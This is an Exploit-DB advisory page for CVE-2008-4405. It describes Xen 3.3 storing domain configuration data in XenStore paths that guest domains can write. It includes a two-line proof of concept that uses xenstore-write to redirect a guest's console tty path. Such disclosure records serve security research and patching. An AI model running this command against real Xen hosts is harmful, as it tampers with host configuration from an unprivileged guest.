Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage

EDB-ID:

32446

CVE:

2008-4405

EDB Verified:

Author:

Pascal Bouchareine

Type:

local

Exploit: /

Platform:

Linux

Date:

2008-09-30

Vulnerable App:

source: https://www.securityfocus.com/bid/31499/info

Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains.

UPDATE (December 19, 2008): The initial proposed patches did not resolve this issue.

Xen 3.3 is vulnerable; other versions may also be affected. 

#yum install xen
# xenstore-write /local/domain/GUEST-DOMID/console/tty /i/am/the/evil/guest

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services